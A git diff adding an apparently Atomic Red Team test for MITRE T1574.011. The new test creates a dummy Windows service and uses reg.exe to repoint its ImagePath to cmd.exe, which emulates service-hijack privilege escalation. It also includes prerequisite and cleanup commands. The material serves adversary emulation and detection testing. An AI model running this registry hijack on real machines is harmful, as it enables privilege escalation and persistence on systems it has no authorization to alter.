diff --git a/atomics/T1574.011/T1574.011.yaml b/atomics/T1574.011/T1574.011.yaml
index 1699ec27..2d13e804 100644
--- a/atomics/T1574.011/T1574.011.yaml
+++ b/atomics/T1574.011/T1574.011.yaml
@@ -4,7 +4,7 @@ atomic_tests:
 - name: Service Registry Permissions Weakness
   auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a
   description: |
-    Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. 
+    Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
     reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
   supported_platforms:
   - windows
@@ -17,4 +17,37 @@ atomic_tests:
     command: |
       get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
       get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
-    name: powershell
\ No newline at end of file
+    name: powershell
+- name: Service ImagePath Change with reg.exe
+  auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827
+  description: |
+    Change Service registry ImagePath of a bengin service to a malicious file
+  supported_platforms:
+  - windows
+  input_arguments:
+    weak_service_name:
+      description: weak service name
+      type: String
+      default: calcservice
+    weak_service_path:
+      description: weak service path
+      type: String
+      default: '%windir%\system32\win32calc.exe'
+    malicious_service_path:
+      description: malicious service path
+      type: String
+      default: '%windir%\system32\cmd.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The service must exist (#{weak_service_name})
+    prereq_command: |
+      if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
+  executor:
+    command: |
+      reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}"
+    cleanup_command: |
+      sc.exe delete #{weak_service_name}
+    name: command_prompt